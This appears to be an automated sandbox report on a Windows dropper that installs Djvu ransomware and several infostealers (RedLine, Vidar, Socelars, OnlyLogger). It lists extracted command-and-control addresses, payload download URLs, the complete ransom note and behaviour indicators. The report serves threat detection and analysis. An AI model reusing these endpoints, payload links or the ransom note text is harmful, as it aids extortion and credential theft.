djvu | 2e71e3bcb39c87ae43d0019b5d62084b8eb2bb0ebe09c05d7cf2ad026082e527

Analysis

max time kernel
64s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
05-03-2022 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07187aaa44a712bf4d7d6d128c5feb85.exe
Size

230KB
MD5

07187aaa44a712bf4d7d6d128c5feb85
SHA1

c2d446972fe6fe86c6142c07c071c85cae3311cc
SHA256

2e71e3bcb39c87ae43d0019b5d62084b8eb2bb0ebe09c05d7cf2ad026082e527
SHA512

ba6f1b41405996a28d6b95424ca26573314f2b0aaa205fb99056a80f5a4bb668b09f406573cf26fab9d4d3dd6a530c5b2476b93a946f26d1911c4308ec77d20c

Score

10^/10

djvu onlylogger redline socelars vidar 2bitok 937 lolz21 discovery evasion infostealer loader ransomware spyware stealer trojan upx

Malware Config

Extracted

Family

socelars

https://sa-us-bucket.s3.us-east-2.amazonaws.com/qwwgh/

Extracted

Family

redline

45.132.1.57:15771

Attributes

auth_value
9d006a439ab657f87bacd7a8c5f366b6

Extracted

Family

redline

Botnet

2BitOK

109.107.181.110:34060

Attributes

auth_value
f55909e031d5c7e9873d54fd28faa717

Extracted

Family

redline

Botnet

Lolz21

94.23.26.20:1611

Attributes

auth_value
63e3c7605d9050fb35c0a6cec9734c8c

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.qbaa
offline_id
rpx4UUTYZiAR5omq187UvM233jloVHyJUkA8s3t1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-G76puQlxBn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0412Jsfkjn

rsa_pubkey.plain

Extracted

Family

vidar

Version

50.4

Botnet

937

https://mastodon.online/@samsa11

https://koyu.space/@samsa2l

Attributes

profile_id
937

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1320-243-0x0000000002220000-0x000000000233B000-memory.dmp	family_djvu
behavioral2/memory/4908-248-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4908-246-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4908-252-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 540 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4176	540	rundll32.exe

RedLine Payload 14 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2124-179-0x0000000000340000-0x00000000004A5000-memory.dmp	family_redline
behavioral2/memory/2124-180-0x0000000000340000-0x00000000004A5000-memory.dmp	family_redline
behavioral2/memory/384-186-0x0000000000770000-0x00000000008F7000-memory.dmp	family_redline
behavioral2/memory/1900-183-0x0000000000900000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/memory/384-182-0x0000000000770000-0x00000000008F7000-memory.dmp	family_redline
behavioral2/memory/1900-178-0x0000000000900000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/memory/1900-192-0x0000000000900000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/memory/2124-211-0x0000000000340000-0x00000000004A5000-memory.dmp	family_redline
behavioral2/memory/384-210-0x0000000000770000-0x00000000008F7000-memory.dmp	family_redline
behavioral2/memory/1900-208-0x0000000000900000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/memory/384-237-0x0000000000770000-0x00000000008F7000-memory.dmp	family_redline
behavioral2/memory/1900-198-0x0000000000900000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/memory/2124-197-0x0000000000340000-0x00000000004A5000-memory.dmp	family_redline
behavioral2/memory/384-245-0x0000000000770000-0x00000000008F7000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\RCWQt2d5JS6ee5AZKe2cP0aJ.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\RCWQt2d5JS6ee5AZKe2cP0aJ.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1924-259-0x0000000000400000-0x000000000050E000-memory.dmp	family_onlylogger
behavioral2/memory/1924-255-0x00000000021B0000-0x00000000021F4000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3508-268-0x0000000002170000-0x000000000221C000-memory.dmp	family_vidar
behavioral2/memory/3508-270-0x0000000000400000-0x0000000000549000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 39 IoCs

Processes:

T6Ut5PqAOLGR19pZrBA6KnkN.exeGL36O2snGtWy_eShImF7_ewF.exeNFBzNF52CKECPCFVWu6mFjSp.exe9hJ6mEjCyQ9fpX7eI2eYA1qG.exeIearPpy69u0Xt9jmtemmbfxe.exeCmKEiSndszc2KPMxiQQ_f5o6.exeRCWQt2d5JS6ee5AZKe2cP0aJ.exeTD8L8ujNu36lGaJREpnXhoYf.exeIHznmwVbyPriG1Xy7TJe9c59.exeW9YQ67wVkEMzXb7t78erdLXI.exeBRkdmCwbwCcbEIqUj2VoQd_V.exeSharkSoftSetup36667.exeTaW1dZd0vST9cSDFMV3LKJG9.exeiJv7e5qhqW1GL9_OPheJLX93.exeC4pue43sbVMIJMsBKAOjQqST.exe00rjOb6UEQkAFotzj0Q_HOOe.exeUvffXCe4GH6_D4Yjybn4bLja.exeVejznfQIjgNXIaBBkdWkFsWz.exeqsIlM2N6g12QJPmeB6FzImDF.exeP4G14v5bCo3CvSJgwYlWni8E.exeeND2CfpOuVuEbusfP_NwJzn5.exeEQJvLsG3NWwZFxScAIWfQOad.exenHunmtO8BfXl5SixFcuGgtWb.exefTvhTtcwwpfxNMCHzkonem8V.exe2AeqfVdC1CeXtqaXCBLd8d_K.exefTvhTtcwwpfxNMCHzkonem8V.tmpInstall.exeInstall.exenHunmtO8BfXl5SixFcuGgtWb.exeRYUT55.exelGv56tg4TRxz0XFPeWymU9pO.exeb1484dc4-ecb4-4b15-af1d-ef568122a8b4.exeIHznmwVbyPriG1Xy7TJe9c59.exeO8btRxHMGSOJ3P9iHg6k2cp3.exeZZhmjV_dtWbdMHspa6E5u6bE.exeLmhIh4vwuUBdG5MbR9BuoTI8.exeWK00LZ2u8UAMkRHlCI94qaRa.exereg.exeLmhIh4vwuUBdG5MbR9BuoTI8.tmp

pid	process
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
1620	GL36O2snGtWy_eShImF7_ewF.exe
1292	NFBzNF52CKECPCFVWu6mFjSp.exe
1924	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
2124	IearPpy69u0Xt9jmtemmbfxe.exe
3168	CmKEiSndszc2KPMxiQQ_f5o6.exe
2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
3508	TD8L8ujNu36lGaJREpnXhoYf.exe
2120	IHznmwVbyPriG1Xy7TJe9c59.exe
2216	W9YQ67wVkEMzXb7t78erdLXI.exe
1900	BRkdmCwbwCcbEIqUj2VoQd_V.exe
2428	SharkSoftSetup36667.exe
3056	TaW1dZd0vST9cSDFMV3LKJG9.exe
1960	iJv7e5qhqW1GL9_OPheJLX93.exe
2768	C4pue43sbVMIJMsBKAOjQqST.exe
228	00rjOb6UEQkAFotzj0Q_HOOe.exe
2868	UvffXCe4GH6_D4Yjybn4bLja.exe
3460	VejznfQIjgNXIaBBkdWkFsWz.exe
3408	qsIlM2N6g12QJPmeB6FzImDF.exe
384	P4G14v5bCo3CvSJgwYlWni8E.exe
1880	eND2CfpOuVuEbusfP_NwJzn5.exe
3016	EQJvLsG3NWwZFxScAIWfQOad.exe
1320	nHunmtO8BfXl5SixFcuGgtWb.exe
908	fTvhTtcwwpfxNMCHzkonem8V.exe
4108	2AeqfVdC1CeXtqaXCBLd8d_K.exe
4220	fTvhTtcwwpfxNMCHzkonem8V.tmp
4288	Install.exe
4808	Install.exe
4908	nHunmtO8BfXl5SixFcuGgtWb.exe
3040	RYUT55.exe
4640	lGv56tg4TRxz0XFPeWymU9pO.exe
4260	b1484dc4-ecb4-4b15-af1d-ef568122a8b4.exe
4848	IHznmwVbyPriG1Xy7TJe9c59.exe
2056	O8btRxHMGSOJ3P9iHg6k2cp3.exe
4604	ZZhmjV_dtWbdMHspa6E5u6bE.exe
3488	LmhIh4vwuUBdG5MbR9BuoTI8.exe
2844	WK00LZ2u8UAMkRHlCI94qaRa.exe
3756	reg.exe
3732	LmhIh4vwuUBdG5MbR9BuoTI8.tmp

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\UvffXCe4GH6_D4Yjybn4bLja.exe	upx
C:\Users\Admin\Pictures\Adobe Films\UvffXCe4GH6_D4Yjybn4bLja.exe	upx

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

07187aaa44a712bf4d7d6d128c5feb85.exeCmKEiSndszc2KPMxiQQ_f5o6.exe2AeqfVdC1CeXtqaXCBLd8d_K.exeW9YQ67wVkEMzXb7t78erdLXI.exelGv56tg4TRxz0XFPeWymU9pO.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	07187aaa44a712bf4d7d6d128c5feb85.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	CmKEiSndszc2KPMxiQQ_f5o6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	2AeqfVdC1CeXtqaXCBLd8d_K.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	W9YQ67wVkEMzXb7t78erdLXI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	lGv56tg4TRxz0XFPeWymU9pO.exe

Loads dropped DLL 3 IoCs

Processes:

fTvhTtcwwpfxNMCHzkonem8V.tmpTD8L8ujNu36lGaJREpnXhoYf.exe

pid process

4220 fTvhTtcwwpfxNMCHzkonem8V.tmp
3508 TD8L8ujNu36lGaJREpnXhoYf.exe
3508 TD8L8ujNu36lGaJREpnXhoYf.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

181 ipinfo.io
263 ip-api.com
24 ipinfo.io
25 ipinfo.io
147 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

BRkdmCwbwCcbEIqUj2VoQd_V.exeIearPpy69u0Xt9jmtemmbfxe.exeP4G14v5bCo3CvSJgwYlWni8E.exe

pid process

1900 BRkdmCwbwCcbEIqUj2VoQd_V.exe
2124 IearPpy69u0Xt9jmtemmbfxe.exe
384 P4G14v5bCo3CvSJgwYlWni8E.exe

pid	process
4220	fTvhTtcwwpfxNMCHzkonem8V.tmp
3508	TD8L8ujNu36lGaJREpnXhoYf.exe
3508	TD8L8ujNu36lGaJREpnXhoYf.exe

flow	ioc
181	ipinfo.io
263	ip-api.com
24	ipinfo.io
25	ipinfo.io
147	ipinfo.io

pid	process
1900	BRkdmCwbwCcbEIqUj2VoQd_V.exe
2124	IearPpy69u0Xt9jmtemmbfxe.exe
384	P4G14v5bCo3CvSJgwYlWni8E.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

nHunmtO8BfXl5SixFcuGgtWb.exeIHznmwVbyPriG1Xy7TJe9c59.exeSharkSoftSetup36667.exe

description	pid	process	target process
PID 1320 set thread context of 4908	1320	nHunmtO8BfXl5SixFcuGgtWb.exe	nHunmtO8BfXl5SixFcuGgtWb.exe
PID 2120 set thread context of 4848	2120	IHznmwVbyPriG1Xy7TJe9c59.exe	IHznmwVbyPriG1Xy7TJe9c59.exe
PID 2428 set thread context of 1276	2428	SharkSoftSetup36667.exe	RegAsm.exe

Drops file in Program Files directory 2 IoCs

Processes:

WerFault.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	WerFault.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1672	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
1872	2768	WerFault.exe	C4pue43sbVMIJMsBKAOjQqST.exe
1292	228	WerFault.exe	00rjOb6UEQkAFotzj0Q_HOOe.exe
3456	3016	WerFault.exe	EQJvLsG3NWwZFxScAIWfQOad.exe
4392	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
4264	2768	WerFault.exe	C4pue43sbVMIJMsBKAOjQqST.exe
4460	4848	WerFault.exe	IHznmwVbyPriG1Xy7TJe9c59.exe
3536	228	WerFault.exe	00rjOb6UEQkAFotzj0Q_HOOe.exe
4000	3016	WerFault.exe	EQJvLsG3NWwZFxScAIWfQOad.exe
3688	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
2284	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
4788	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
4456	4604	WerFault.exe	ZZhmjV_dtWbdMHspa6E5u6bE.exe
2332	4604	WerFault.exe	ZZhmjV_dtWbdMHspa6E5u6bE.exe
3716	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
2080	4604	WerFault.exe	ZZhmjV_dtWbdMHspa6E5u6bE.exe
4324	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
2572	4604	WerFault.exe	ZZhmjV_dtWbdMHspa6E5u6bE.exe
396	1924	WerFault.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
3372	4604	WerFault.exe	ZZhmjV_dtWbdMHspa6E5u6bE.exe
672	4976	WerFault.exe	dengbing.exe
5300	4976	WerFault.exe	dengbing.exe
5308	2740	WerFault.exe	rundll32.exe
2820	5184	WerFault.exe	bearvpn3.exe
4976	3516	WerFault.exe	explorer.exe
3404	4704	WerFault.exe	temp-working.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TD8L8ujNu36lGaJREpnXhoYf.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TD8L8ujNu36lGaJREpnXhoYf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TD8L8ujNu36lGaJREpnXhoYf.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4464 schtasks.exe
3688 schtasks.exe
1892 schtasks.exe
5720 schtasks.exe
5896 schtasks.exe
4952 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4968 timeout.exe
1668 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3772 tasklist.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4564 taskkill.exe
4472 taskkill.exe
4680 taskkill.exe
3692 taskkill.exe
316 taskkill.exe

pid	process
4464	schtasks.exe
3688	schtasks.exe
1892	schtasks.exe
5720	schtasks.exe
5896	schtasks.exe
4952	schtasks.exe

pid	process
4968	timeout.exe
1668	timeout.exe

pid	process
3772	tasklist.exe

pid	process
4564	taskkill.exe
4472	taskkill.exe
4680	taskkill.exe
3692	taskkill.exe
316	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

07187aaa44a712bf4d7d6d128c5feb85.exeT6Ut5PqAOLGR19pZrBA6KnkN.exe

pid	process
2956	07187aaa44a712bf4d7d6d128c5feb85.exe
2956	07187aaa44a712bf4d7d6d128c5feb85.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe
2372	T6Ut5PqAOLGR19pZrBA6KnkN.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

RCWQt2d5JS6ee5AZKe2cP0aJ.exeW9YQ67wVkEMzXb7t78erdLXI.exepowershell.exeSharkSoftSetup36667.exetaskkill.exereg.exe

description	pid	process
Token: SeCreateTokenPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeAssignPrimaryTokenPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeLockMemoryPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeIncreaseQuotaPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeMachineAccountPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeTcbPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeSecurityPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeTakeOwnershipPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeLoadDriverPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeSystemProfilePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeSystemtimePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeProfSingleProcessPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeIncBasePriorityPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeCreatePagefilePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeCreatePermanentPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeBackupPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeRestorePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeShutdownPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeDebugPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeAuditPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeSystemEnvironmentPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeChangeNotifyPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeRemoteShutdownPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeUndockPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeSyncAgentPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeEnableDelegationPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeManageVolumePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeImpersonatePrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeCreateGlobalPrivilege	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: 31	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: 32	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: 33	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: 34	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: 35	2532	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
Token: SeDebugPrivilege	2216	W9YQ67wVkEMzXb7t78erdLXI.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	2428	SharkSoftSetup36667.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeCreateTokenPrivilege	3756	reg.exe
Token: SeAssignPrimaryTokenPrivilege	3756	reg.exe
Token: SeLockMemoryPrivilege	3756	reg.exe
Token: SeIncreaseQuotaPrivilege	3756	reg.exe
Token: SeMachineAccountPrivilege	3756	reg.exe
Token: SeTcbPrivilege	3756	reg.exe
Token: SeSecurityPrivilege	3756	reg.exe
Token: SeTakeOwnershipPrivilege	3756	reg.exe
Token: SeLoadDriverPrivilege	3756	reg.exe
Token: SeSystemProfilePrivilege	3756	reg.exe
Token: SeSystemtimePrivilege	3756	reg.exe
Token: SeProfSingleProcessPrivilege	3756	reg.exe
Token: SeIncBasePriorityPrivilege	3756	reg.exe
Token: SeCreatePagefilePrivilege	3756	reg.exe
Token: SeCreatePermanentPrivilege	3756	reg.exe
Token: SeBackupPrivilege	3756	reg.exe
Token: SeRestorePrivilege	3756	reg.exe
Token: SeShutdownPrivilege	3756	reg.exe
Token: SeDebugPrivilege	3756	reg.exe
Token: SeAuditPrivilege	3756	reg.exe
Token: SeSystemEnvironmentPrivilege	3756	reg.exe
Token: SeChangeNotifyPrivilege	3756	reg.exe
Token: SeRemoteShutdownPrivilege	3756	reg.exe
Token: SeUndockPrivilege	3756	reg.exe
Token: SeSyncAgentPrivilege	3756	reg.exe
Token: SeEnableDelegationPrivilege	3756	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

07187aaa44a712bf4d7d6d128c5feb85.exe

description	pid	process	target process
PID 2956 wrote to memory of 2372	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	T6Ut5PqAOLGR19pZrBA6KnkN.exe
PID 2956 wrote to memory of 2372	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	T6Ut5PqAOLGR19pZrBA6KnkN.exe
PID 2956 wrote to memory of 1620	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	GL36O2snGtWy_eShImF7_ewF.exe
PID 2956 wrote to memory of 1620	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	GL36O2snGtWy_eShImF7_ewF.exe
PID 2956 wrote to memory of 1620	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	GL36O2snGtWy_eShImF7_ewF.exe
PID 2956 wrote to memory of 1292	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	NFBzNF52CKECPCFVWu6mFjSp.exe
PID 2956 wrote to memory of 1292	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	NFBzNF52CKECPCFVWu6mFjSp.exe
PID 2956 wrote to memory of 1292	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	NFBzNF52CKECPCFVWu6mFjSp.exe
PID 2956 wrote to memory of 1924	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
PID 2956 wrote to memory of 1924	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
PID 2956 wrote to memory of 1924	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
PID 2956 wrote to memory of 2124	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IearPpy69u0Xt9jmtemmbfxe.exe
PID 2956 wrote to memory of 2124	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IearPpy69u0Xt9jmtemmbfxe.exe
PID 2956 wrote to memory of 2124	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IearPpy69u0Xt9jmtemmbfxe.exe
